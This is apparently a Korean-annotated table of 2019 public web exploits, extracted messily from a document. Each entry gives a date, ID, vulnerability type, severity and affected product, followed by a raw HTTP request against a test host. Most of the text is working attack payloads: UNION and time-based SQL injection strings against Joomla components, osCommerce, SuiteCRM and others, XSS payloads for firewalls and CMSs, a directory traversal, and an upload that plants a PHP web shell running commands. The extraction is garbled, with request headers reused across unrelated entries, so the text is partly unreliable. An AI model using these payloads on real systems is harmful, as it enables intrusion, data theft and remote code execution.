text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 985Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991;PHPSESSID=6c6c795380ae5a25888e1dd57e04320a;c9ffd68b334eb414c880fa254194ecbb=6053bfbb8394c9545ab2169c4399aefcDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

controller=search&task=searchHotels&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&hotel_id=&day_end=24&rooms=-1 UNION SELECT 1,(selECt(@x)fROm(selECt(@x:

=0x00)%2c(@rUNNing_nuMBer

Joomla! Component

Joomla!Component

JMultipleHotelReservation

6.0.7



CruisePortal 6.0.4 - SQL

Injection

POST /10.0.100.24/cruises/cruises HTTP/1.1

Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 518Connection: keep-aliveUpgrade-Insecure-Requests: 1

controller=search&task=searchCruises&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&cruise_id=&day_end=24&rooms=1&guest_adult=2%20%20%2f%2a%21%31%31%31%31%31%61%6e%44%2a%2f%20%73%6c%65%65%70%28%35%29&guest_child=0&filterParams=&resetSearch=1&searchType=&searchId=&room-guests%5B%5D=2&room-guests-children%5B%5D=0&keyword=&jcruisereservation_datas=01%2F23%2F2019&jcruisereservation_datae=01%2F24%2F2019&jcruisereservation_rooms=1&jcruisereservation_guest_adult=2&jcruisereservation_guest_child=0: undefined

Joomla! Component

Joomla!Component J-CruisePortal

6.0.4




2019-01-24 46234 SQL Injection 중 중

Joomla! Component

JHotelReservation 6.0.7 - SQL

Injection

POST /10.0.100.24/j-myhotel/search-hotels?view=hotels HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateAlt-Used: TARGET:443Connection: keep-aliveContent-Tye: application/x-www-form-urlencodedContent-Length: 965

task=hotels.searchHotels&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&hotel_id=&day_end=24&rooms=1%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%31%3

1%31%31%53%45%4c%45%43%54%2a%2f%20%31%2c%76%65%72%73%69%6f%6e%28%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%

2c%31%32%2c%31%......33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%3

3%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2c%34%33%2c%34%34%2d%2d%20%2d&guest_adult=2&guest_child=0&filterParams=facilityId%3D1&resetSearch=0'&searchType=&searchId=&priceLow=&priceHigh=&room-guests%5B%5D=2&room-guests-children%5B%5D=0&keyword=Paris&jhotelreservation_datas=23-01-2019&jhotelreservation_datae=24-01-2019&jhotelreservation_rooms=1&jhotelreservation_guest_adult=2&jhotelreservation_guest_child=0

Joomla! Component

Joomla!Component

JHotelReservation 6.0.7

2019-01-24 46235 SQL Injection 하 중SimplePress CMS 1.0.7 - SQL

Injection

GET/10.0.100.24/?p=%2d%31%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29,(%34%29%2c%28%35%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%37%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%29%2d%2d%20%2d HTTP/1.1

Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: NO_CACHE=1; CAKEPHP=72i3s18s3sk0mn2c63gi0pikq0;PHPSESSID=i9sb2qgkcblm5l47uv4d3h2vm1DNT: 1


SimplePress CMSSimplePress

CMS 1.0.7

2019-01-24 46237 XSS 하 하SirsiDynix e-Library 3.5.x -


POST/10.0.100.24/uhtbin/cgisirsi/?ps=0Sk8zSpD0f/MAIN/33660028/123HTTP/1.1Host: 10.0.100.24:1004

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer:http://target/uhtbin/cgisirsi/?ps=mmRoXTc0L3/MAIN/33660028/38/1/X/BLASTOFFConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 197

searchdata1=test&srchfield1=AU%5EAUTHOR%5EAUTHORS%5EAuthor+Processing%5EYazar&library=VLK&srch_history=--%C3%96nceki+soruyu+se%C3%A7--&sort_by=ANYhadvi%22%3e%3cscript%3ealert(1)%3c%2fscript%3eox0ix

SirsiDynix e-Library

SirsiDynix e-Library 3.5.x

2019-01-24 46239 SQL Injection 하 하ImpressCMS 1.3.11 - 'bid' SQL

Injection

POST /10.0.100.24/impress/modules/system/admin.php?bid=12HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0

Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 70

DNT: 1Connection: keep-alive


bid=12') AND SLEEP(5) AND('Bjhx'='Bjhx&fct=blocksadmin&op=up&rtn=Lw==

ImpressCMSImpressCMS1.3.11

2019-01-25 46244 SQL Injection 중 중 GreenCMS 2.x - SQL Injection

GET/10.0.100.24/index.php?m=admin&c=posts&a=index&cat=1%27))%20AND%201=BENCHMARK(100000000,MD5(0x456665))--%20- HTTP/1.1

Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveUpgrade-Insecure-Requests: 1

GreenCMS GreenCMS 2.x

2019-01-28 46259 SQL Injection 하 하CMSsite 1.0 - 'cat_id' SQL

Injection

POST /10.0.100.24/cm/category.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 52

cat_id=7 UNION SELECT 1,2,user(),3,4,5,6,7,8,9,10%23

CMSsite CMSsite 1.0




2019-01-28 46266 SQL Injection 하 하Newsbull Haber Script 1.0.0 -

'search' SQL Injection

POST /10.0.100.24/admin/comment/records? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 64

userId=1&search=-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'

Newsbull HaberScript

NewsbullHaber Script

1.0.0


Care2x 2.7 (HIS) Hospital

Information System - Multiple

SQL Injection

GET /10.0.100.24/main/login.php?ntid=false&lang=en HTTP/1.1

Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14;rv:64.0) Gecko/20100101 Firefox/64.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer:http://192.168.0.108/main/indexframe.php?boot=1&mask=&lang=en&cookie=&sid=6fclqapl9gsjhrcgoh3q0la5spConnection: close

Cookie: sid=6fclqapl9gsjhrcgoh3q0la5sp;ck_sid6fclqapl9gsjhrcgoh3q0la5sp=m14AAA%3D%3D%23WVUYpUnF%2Fo28ZWY45A5Sh9HMvr%2FZ8wVabFY%3D;ck_config=CFG5c414492459f90.28518700%201547781266Upgrade-Insecure-Requests: 1

HospitalInformation System

Care2x 2.7(HIS)

HospitalInformation

System

2019-01-28 46270 SQL Injection 하 하Teameyo Project Management

System 1.0 - SQL Injection

GET /10.0.100.24/messages.php?project_id=-48%27%20union%20select%20(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rU

NNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)--%20- HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brCookie: PHPSESSID=1ug6oq40f09kft3jqncc4pco71DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Teameyo ProjectManagement System

TeameyoProject

ManagementSystem 1.0

2019-01-28 46271 SQL Injection 하 하Mess Management System 1.0

- SQL Injection

GET

/10.0.100.24/index.php?mod=admin&pg=admin_form&id=%2d%31%27%20%7

5%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2d%2d%20%2d HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=6bpo344k5sbed3vd2lc6tlgh80DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Mess ManagementSystem

MessManagementSystem 1.0

2019-01-28 46273 XSS 하 하MyBB IP History Logs Plugin

1.0.2 - Cross-Site Scripting

POST /10.0.100.24/admin/index.php?module=tools-ip_history_logsHTTP/1.1Host: 10.0.100.24:1004Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer:http://target/uhtbin/cgisirsi/?ps=mmRoXTc0L3/MAIN/33660028/38/1/X/BLASTOFFConnection: closeUpgrade-Insecure-Requests: 1


User-Agent=<script>alert('XSS')</script>

MyBB IP HistoryLogs Plugin

MyBB IPHistory LogsPlugin 1.0.2

2019-02-04 46316 XSS 하 하pfSense 2.4.4-p1 - Cross-Site

Scripting

POST /10.0.100.24/system_advanced_admin.php HTTP/1.1Host: 10.0.100.24:1004Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer:http://target/uhtbin/cgisirsi/?ps=mmRoXTc0L3/MAIN/33660028/38/1/

X/BLASTOFFConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 40

webguiproto="><script>alert(1)</script>

pfSensepfSense

2.4.4-p1

2019-02-04 46315 XSS 하 하Nessus 8.2.1 - Cross-Site

Scripting

POST /10.0.100.24/policies HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost:8834/Content-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467

DNT: 1Connection: close

value=\"><script>alert(1)</script>

Nessus Nessus 8.2.1

2019-02-04 46311 SQL Injection 하 하SuiteCRM 7.10.7 - 'record' SQL

Injection

GET/10.0.100.24/SuiteCRM/index.php?module=Users&action=DetailView&record=1aNd if(length(0x454d49524f474c55)>1,sleep(5),0) HTTP/1.1

SuiteCRMSuiteCRM7.10.7




2019-02-04 46310 SQL Injection 하 하SuiteCRM 7.10.7 - 'parentTab'

SQL Injection

GET/10.0.100.24/SuiteCRM/index.php?module=Emails&action=index&parentTab=99999999%27)/**/oR/**/6617279=6617279/**/aNd/**/(%276199%27)=(%276199 HTTP/1.1

SuiteCRMSuiteCRM7.10.7


ResourceSpace 8.6 -

'watched_searches.php' SQL

Injection

GET/10.0.100.24/plugins/rse_search_notifications/pages/watched_searches.php?offset=0&callback=checknow&ref=[SQL]&ajax=true&_=1548992497510 HTTP/1.1

ResourceSpaceResourceSpace

8.6

2019-02-06 46330 SQL Injection 하 하osCommerce 2.3.4.1 -

'reviews_id' SQL Injection

GET/10.0.100.24/oscommerce/catalog/product_reviews_write.php?products_id=19&reviews_id=99999999/**/oR/**/7096077=7096077/**/aNd/**/7193=7193 HTTP/1.1

osCommerceosCommerce2.3.4.1

2019-02-06 46329 SQL Injection 하 하osCommerce 2.3.4.1 -

'products_id' SQL Injection

GET/10.0.100.24/oscommerce/catalog/product_info.php?products_id=999

99999oR 1811160=1811160 aNd 7193=7193 HTTP/1.1

osCommerceosCommerce

2.3.4.1

2019-02-06 46328 SQL Injection 하 하osCommerce 2.3.4.1 - 'currency'

SQL Injection

GET/10.0.100.24/oscommerce/catalog/shopping_cart.php?currency=99999999%27oR 3620772=3620772 aNd %276199%27=%2761993 HTTP/1.1

osCommerceosCommerce2.3.4.1

2019-02-11 46350 SQL Injection 중 중Webiness Inventory 2.3 -

'email' SQL Injection

POST /10.0.100.24/webiness/index.php?request=Wsauth/login/HTTP/1.1Host: 10.0.100.24:1004Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 456Content-Type: multipart/form-data;boundary=54a535315dda429db2f07895827ff1c6

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64)

AppleWebKit/537.36 (KHTML,like Gecko) Chrome/54.0.2840.99 Safari/537.36

--54a535315dda429db2f07895827ff1c6Content-Disposition: form-data; name="email"

-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT

COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FL

OOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'--54a535315dda429db2f07895827ff1c6Content-Disposition: form-data; name="password"

--54a535315dda429db2f07895827ff1c6--

Webiness Inventory2.3

WebinessInventory 2.3

2019-02-11 46349 XSS 하 하CentOS Web Panel 0.9.8.763 -


POST /10.0.100.24/policies HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0

Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost:8834/Content-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467DNT: 1Connection: close

Package Name=<script>alert(1)</script>

CentOS Web PanelCentOS Web

Panel0.9.8.763

2019-02-11 46344 XSS 중 하 IPFire 2.21 - Cross-Site Scripting

POST /10.0.100.24/cgi-bin/mail.cgi HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate

Referer: https://localhost:8834/Content-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467DNT: 1Connection: close

txt_mailsender='"><script>alert(1)</script>txt_recipient='><script>alert(2)</script>txt_mailserver='><script>alert(3)</script>txt_mailport='><script>alert(4)</script>txt_mailuser='><script>alert(5)</script>txt_mailpass='><script>alert(6)</script>PROXY_PORT='><script>alert(7)</script>TRANSPARENT_PORT='><script>alert(8)</script>

UPSTREAM_PROXY='><script>alert(9)</script>UPSTREAM_USER='><script>alert(10)</script>UPSTREAM_PASSWORD='><script>alert(11)</script>FILEDESCRIPTORS='><script>alert(12)</script>CACHE_MEM='><script>alert(13)</script>

CACHE_SIZE='><script>alert(14)</script>

IPFire IPFire 2.21

2019-02-11 46333 XSS 하 하Smoothwall Express 3.1-SP4 -


POST /10.0.100.24/cgi-bin/proxy.cgi? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost:8834/Content-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467DNT: 1Connection: close

CACHE_SIZE='><script>alert(1)</script>MAX_SIZE='><script>alert(2)</script>MIN_SIZE='><script>alert(3)</script>

MAX_OUTGOING_SIZE='><script>alert(4)</script>

MAX_INCOMING_SIZE='><script>alert(5)</script>REDIRECT_PAGE='><script>alert(6)</script>

Smoothwall ExpressSmoothwallExpress 3.1-

SP4




2019-02-12 46353 Directory Traversal 하 하BlogEngine.NET 3.3.6 -

Directory Traversal

GET /?theme=../../App_Data/files HTTP/1.1

Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

BlogEngine.NETBlogEngine.NE

T 3.3.6

2019-02-12 46351 XSS 하 하OPNsense < 19.1.1 - Cross-Site

Scripting

POST /10.0.100.24/diag_backup.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept: */*

Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost:8834/Content-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467DNT: 1Connection: close

GDrive_GDriveEmail="><script>alert(1)</script>GDrive_GDriveFolderID="><script>alert(2)</script>GDrive_GDriveBackupCount="><script>alert(3)</script>Nextcloud_url="><script>alert(4)</script>Nextcloud_user="><script>alert(5)</script>Nextcloud_password="><script>alert(6)</script>Nextcloud_password_encryption="><script>alert(7)</script>

OPNsenseOPNsense <19.1.1

2019-02-13 46368 SQL Injection 하 중PilusCart 1.4.1 - 'send' SQL

Injection

POST /10.0.100.24/PiLUS/read-apa-itu-pdo?post_id=3&post_slug=apa-itu-pdo&nama_komentar=4866630&situs_web=9391510&captcha=4551404&toke

n=473ec0c6bda264fefb8447c8ff01956248ea477c&isi_komentar=EMIROGLU2823174&send=Kirim HTTP/1.1Host: 10.0.100.24:1004Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5

Cache-Control: no-cacheContent-Length: 456Content-Type: multipart/form-data;boundary=54a535315dda429db2f07895827ff1c6User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64)

AppleWebKit/537.36 (KHTML,like Gecko) Chrome/54.0.2840.99 Safari/537.36

--54a535315dda429db2f07895827ff1c6

Content-Disposition: form-data; name="email"-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECTCOUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CH

AR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'--54a535315dda429db2f07895827ff1c6Content-Disposition: form-data; name="password"--54a535315dda429db2f07895827ff1c6--

PilusCartPilusCart1.4.1

2019-02-13 46366 XSS 하 하

Rukovoditel Project

Management CRM 2.4.1 -


GET /10.0.100.24/index.php?module=users%2flogin HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467DNT: 1Connection: close

RukovoditelProject Management

CRM

RukovoditelProject

ManagementCRM 2.4.1


WordPress Plugin Booking

Calendar 8.4.3 - Authenticated

SQL Injection

POST /10.0.100.24/PiLUS/read-apa-itu-pdo?post_id=3&post_slug=apa-itu-pdo&nama_komentar=4866630&situs_web=9391510&captcha=4551404&token=473ec0c6bda264fefb8447c8ff01956248ea477c&isi_komentar=EMIROGLU2823174&send=Kirim HTTP/1.1Host: 10.0.100.24:1004Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 456Content-Type: multipart/form-data;boundary=54a535315dda429db2f07895827ff1c6

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64)AppleWebKit/537.36 (KHTML,like Gecko) Chrome/54.0.2840.99 Safari/537.36

action=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND

(1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67

WordPress PluginBooking Calendar

WordPressPlugin

BookingCalendar8.4.3

2019-02-14 46375 XSS 하 하

DomainMOD 4.11.01 -

'assets/add/dns.php' Cross-Site

Scripting

Profile Name="><img src=x onerror=alert("XSSed-By-Abdul-Kareem")>notes="><img src=x onerror=alert("XSSed-By-Abdul-Kareem")>

DomainMODDomainMOD4.11.01

2019-02-14 46374 XSS 하 하

DomainMOD 4.11.01 -

'category.php CatagoryName,

StakeHolder' Cross-Site

Scripting

CatagoryName="><img src=xonerror=alert("Xss-By-Abdul-Raheem")>StakeHolder="><img src=xonerror=alert("Xss-By-Abdul-Raheem")>


2019-02-14 46373 XSS 하 하

DomainMOD 4.11.01 - 'ssl-

accounts.php username' Cross-

Site Scripting

username="><img src=xonerror=alert("Xss-By-Abdul-Raheem")> DomainMODDomainMOD4.11.01

2019-02-14 46372 XSS 하 하

DomainMOD 4.11.01 - 'ssl-

provider-name' Cross-Site

Scripting

ssl-provider-name="><img src=x onerror=alert("Xss-By-Abdul-Raheem")>ssl-provider's-url="><img src=x onerror=alert("Xss-By-Abdul-Raheem")>





2019-02-15 46389 File Upload 하 상

UniSharp Laravel File Manager

2.0.0-alpha7 - Arbitrary File

Upload

POST /10.0.100.24/laravel-filemanager/upload HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0)Gecko/20100101 Firefox/54.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestReferer: http://10.0.100.24:1004/laravel-filemanager?type=FilesContent-Length: 527Connection: keep-alive

-----------------------------260082409123824'Content-Disposition: form-data; name="upload[]";filename="c0w.php"'Content-Type: text/plainHappy Hacking!!<?

"system($_REQUEST['cmd']);"?>------------------------------------------------260082409123824Content-Disposition: form-data; name="working_dir"/1-----------------------------260082409123824'Content-Disposition: form-data; name="type"

Files-----------------------------260082409123824Content-Disposition: form-data; name="_token"

UniSharp LaravelFile Manager

UniSharp

Laravel FileManager

2.0.0-alpha7


qdPM 9.1 -

'search_by_extrafields[]' SQL

Injection

search[keywords]=&search_by_extrafields[]=%5c qdPM qdPM 9.1

POST/10.0.100.24/common/FileAttachment.jsp?module=CustomLogin&view=Dashboard1 HTTP/1.1Host: 10.0.100.24:1004

Content-Length: 508Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98Safari/537.36Content-Type: multipart/form-data; boundary=----aaa

Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9,vi;q=0.8Connection: close

------aaaContent-Disposition: form-data; name="sspsetup"Attach------aaaContent-Disposition: form-data; name="module"CustomLogin------aaaContent-Disposition: form-data; name="filePath";

filename="test.jsp"Content-Type: text/htmlThis is shell content------aaaContent-Disposition: form-data; name="hmtlcontent"------aaa--

2019-02-18 46408 XSS 하 하Comodo Dome Firewall 2.7.0 -


username="><script>alert(1)</script>comment=<script>alert(2)</script>admin_name=<script>alert(3)</script>name=<script>alert(4)</script>surname=<script>alert(5)</script>newLicense=<script>alert(6)</script>organization="><script>alert(7)</script>BACKUP_RCPTTO=<script>alert(8)</script>netmask_addr=<script>alert(9)</script>

Comodo DomeFirewall

Comodo DomeFirewall2.7.0

2019-02-18 46406 XSS 하 하Apache CouchDB 2.3.0 - Cross-

Site Scripting

Database = <img src=x onerror=alert(1)>Put = <img src=x onerror=alert(2)>Delete = <img src=x onerror=alert(2)>

Apache CouchDBApache

CouchDB 2.3.0

2019-02-18 46402 SQL Injection 하 하CMSsite 1.0 - 'post' SQL

Injection

POST /10.0.100.24/CMSsite/post.php? HTTP/1.1Host: 10.0.100.24:1004Content-Length: 45Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/qdPM/Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1

Host: localhostConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

post=1%20and%20(sleep(10))

CMSsite CMSsite 1.0

2019-02-18 46399 XSS 하 하qdPM 9.1 - 'search[keywords]'


POST /10.0.100.24/qdpm/index.php/users HTTP/1.1Host: 10.0.100.24:1004

Content-Length: 73Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/qdPM/Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

search[keywords]=e"><script>zi2u(9111)</script>&search_by_extrafields[]=9

qdPM qdPM 9.1

2019-02-18 46398 XSS 하 하qdPM 9.1 - 'type' Cross-Site

Scripting

GET/10.0.100.24/qdpm/index.php/configuration?type=tasks_columns_list<script>bKtx(9366)</script>HTTP/1.1Host: 10.0.100.24:1004Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,

like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

qdPM qdPM 9.1

Zoho ManageEngine

ServiceDesk Plus (SDP) < 10.0

build 10012 - Arbitrary File

Upload

Zoho ManageEngineServiceDesk Plus

(SDP)

ZohoManageEngineServiceDeskPlus (SDP) <10.0 build

10012

2019-02-18 46413 File Upload 하 상




2019-02-19 46426 XSS 하 하Ask Expert Script 3.0.5 - Cross

Site Scripting

GET

